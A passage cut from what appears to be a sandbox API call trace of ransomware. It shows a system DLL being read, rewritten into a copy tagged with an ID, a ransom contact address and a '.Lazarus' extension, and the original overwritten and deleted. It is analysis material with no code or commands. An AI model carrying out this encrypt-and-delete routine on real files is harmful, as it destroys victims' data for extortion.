lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0088.181] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.181] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0088.181] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0088.182] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0088.182] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0088.182] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0088.182] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0088.182] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0088.182] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0088.182] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.182] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0088.182] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0088.182] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0088.182] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0088.182] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0088.182] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0088.182] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.182] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0088.182] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0088.182] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0088.182] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0088.182] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0088.182] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0088.182] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0088.182] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0088.182] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0088.182] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0088.182] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0088.182] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0088.182] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0088.182] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0088.182] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0088.182] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0088.182] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0088.182] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0088.182] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0088.182] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0088.182] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0088.183] AreFileApisANSI () returned 1 [0088.183] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 90 [0088.183] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb4) returned 0x55f20 [0088.183] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=90 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll") returned 90 [0088.183] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l1-2-0.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x809e6bf5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x809e6bf5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x48c0)) returned 1 [0088.183] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0088.183] AreFileApisANSI () returned 1 [0088.183] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0088.183] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.183] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0088.183] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0088.183] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0088.183] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.183] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0088.183] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0088.183] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0088.183] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0088.183] GetLastError () returned 0x0 [0088.183] SetLastError (dwErrCode=0x0) [0088.183] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e180 [0088.183] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x8e440 [0088.183] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b568 [0088.183] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d510 [0088.183] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6f0 [0088.183] GetLastError () returned 0x0 [0088.183] SetLastError (dwErrCode=0x0) [0088.183] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0088.183] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71828 [0088.183] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8f) returned 0x8ace8 [0088.183] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0088.183] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x55f20 [0088.183] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0088.183] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0088.184] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0088.184] AreFileApisANSI () returned 1 [0088.184] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x55f20, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 152 [0088.184] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x130) returned 0x5e870 [0088.184] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x55f20, cbMultiByte=-1, lpWideCharStr=0x5e870, cchWideChar=152 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 152 [0088.184] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l1-2-0.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0088.185] GetFileType (hFile=0x348) returned 0x1 [0088.185] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e870 | out: hHeap=0x20000) returned 1 [0088.185] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0088.185] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0088.185] AreFileApisANSI () returned 1 [0088.186] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 90 [0088.186] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb4) returned 0x4ebc8 [0088.186] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=90 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll") returned 90 [0088.186] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l1-2-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0088.186] GetFileType (hFile=0x360) returned 0x1 [0088.186] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0088.186] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a430 [0088.186] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35270 [0088.186] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35110 [0088.186] GetLastError () returned 0x0 [0088.186] SetLastError (dwErrCode=0x0) [0088.186] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0088.186] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0088.186] GetLastError () returned 0x0 [0088.186] SetLastError (dwErrCode=0x0) [0088.186] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0088.186] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0088.186] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8f658 [0088.186] ReadFile (in: hFile=0x360, lpBuffer=0x8f658, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8f658*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0088.215] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0088.215] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d540 [0088.215] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x48c98 [0088.215] GetLastError () returned 0x0 [0088.216] SetLastError (dwErrCode=0x0) [0088.216] GetLastError () returned 0x0 [0088.216] SetLastError (dwErrCode=0x0) [0088.216] GetLastError () returned 0x0 [0088.216] SetLastError (dwErrCode=0x0) [0088.216] GetLastError () returned 0x0 [0088.216] SetLastError (dwErrCode=0x0) [0088.216] ReadFile (in: hFile=0x360, lpBuffer=0x8f658, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f658*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0088.216] WriteFile (in: hFile=0x348, lpBuffer=0x48c98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x48c98*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0088.217] GetLastError () returned 0x0 [0088.217] SetLastError (dwErrCode=0x0) [0088.217] GetLastError () returned 0x0 [0088.217] SetLastError (dwErrCode=0x0) [0088.218] GetLastError () returned 0x0 [0088.218] SetLastError (dwErrCode=0x0) [0088.218] GetLastError () returned 0x0 [0088.218] SetLastError (dwErrCode=0x0) [0088.218] ReadFile (in: hFile=0x360, lpBuffer=0x8f658, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f658*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0088.218] WriteFile (in: hFile=0x348, lpBuffer=0x48c98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x48c98*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0088.218] GetLastError () returned 0x0 [0088.218] SetLastError (dwErrCode=0x0) [0088.218] GetLastError () returned 0x0 [0088.218] SetLastError (dwErrCode=0x0) [0088.219] GetLastError () returned 0x0 [0088.219] SetLastError (dwErrCode=0x0) [0088.219] GetLastError () returned 0x0 [0088.219] SetLastError (dwErrCode=0x0) [0088.219] ReadFile (in: hFile=0x360, lpBuffer=0x8f658, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f658*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0088.219] WriteFile (in: hFile=0x348, lpBuffer=0x48c98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x48c98*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0088.219] GetLastError () returned 0x0 [0088.219] SetLastError (dwErrCode=0x0) [0088.220] GetLastError () returned 0x0 [0088.220] SetLastError (dwErrCode=0x0) [0088.220] GetLastError () returned 0x0 [0088.220] SetLastError (dwErrCode=0x0) [0088.220] GetLastError () returned 0x0 [0088.220] SetLastError (dwErrCode=0x0) [0088.220] ReadFile (in: hFile=0x360, lpBuffer=0x8f658, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f658*, lpNumberOfBytesRead=0x327f0c4*=0x8c0, lpOverlapped=0x0) returned 1 [0088.220] WriteFile (in: hFile=0x348, lpBuffer=0x48c98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x48c98*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0088.220] GetLastError () returned 0x0 [0088.220] SetLastError (dwErrCode=0x0) [0088.220] GetLastError () returned 0x0 [0088.220] SetLastError (dwErrCode=0x0) [0088.221] ReadFile (in: hFile=0x360, lpBuffer=0x8f658, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f658*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0088.221] GetLastError () returned 0x0 [0088.221] SetLastError (dwErrCode=0x0) [0088.221] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d540 | out: hHeap=0x20000) returned 1 [0088.221] WriteFile (in: hFile=0x348, lpBuffer=0x48c98*, nNumberOfBytesToWrite=0x8c0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x48c98*, lpNumberOfBytesWritten=0x327ef70*=0x8c0, lpOverlapped=0x0) returned 1 [0088.221] GetLastError () returned 0x0 [0088.221] SetLastError (dwErrCode=0x0) [0088.221] GetLastError () returned 0x0 [0088.221] SetLastError (dwErrCode=0x0) [0088.221] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0088.221] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0088.221] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35270 | out: hHeap=0x20000) returned 1 [0088.221] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a430 | out: hHeap=0x20000) returned 1 [0088.221] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x48c98 | out: hHeap=0x20000) returned 1 [0088.221] CloseHandle (hObject=0x348) returned 1 [0088.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8f658 | out: hHeap=0x20000) returned 1 [0088.223] CloseHandle (hObject=0x360) returned 1 [0088.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0088.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0088.223] AreFileApisANSI () returned 1 [0088.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 90 [0088.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb4) returned 0x4ebc8 [0088.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=90 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll") returned 90 [0088.223] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l1-2-0.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0088.224] GetFileType (hFile=0x360) returned 0x1 [0088.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0088.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8f658 [0088.225] GetLastError () returned 0xb7 [0088.225] SetLastError (dwErrCode=0xb7) [0088.225] WriteFile (in: hFile=0x360, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0088.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8f658 | out: hHeap=0x20000) returned 1 [0088.226] CloseHandle (hObject=0x360) returned 1 [0088.226] AreFileApisANSI () returned 1 [0088.226] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 90 [0088.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb4) returned 0x4ebc8 [0088.226] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=90 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll") returned 90 [0088.226] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l1-2-0.dll")) returned 1 [0088.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0088.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0088.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0088.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0088.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0088.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0088.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0088.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0088.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6f0 | out: hHeap=0x20000) returned 1 [0088.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d510 | out: hHeap=0x20000) returned 1 [0088.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8e440 | out: hHeap=0x20000) returned 1 [0088.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b568 | out: hHeap=0x20000) returned 1 [0088.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0088.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0088.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0088.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0088.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0088.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0088.228] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.228] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.228] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x809e6bf5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x809e6bf5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x48c0, dwReserved0=0x1, dwReserved1=0x202f4, cFileName="api-ms-win-core-file-l2-1-0.dll", cAlternateFileName="API-MS~2.DLL")) returned 1 [0088.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0088.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0088.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0088.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68b80 [0088.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0088.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0088.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0088.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0088.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0088.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0088.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68b80 | out: hHeap=0x20000) returned 1 [0088.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0088.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0088.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0088.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0088.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0088.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0088.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0088.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0088.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35090 | out: hHeap=0x20000) returned 1 [0088.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0088.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0088.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0088.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x55f20 [0088.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0088.229] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0088.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x4ebc8 [0088.229] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0088.229] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.229] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.229] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.229] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.229] HeapFree 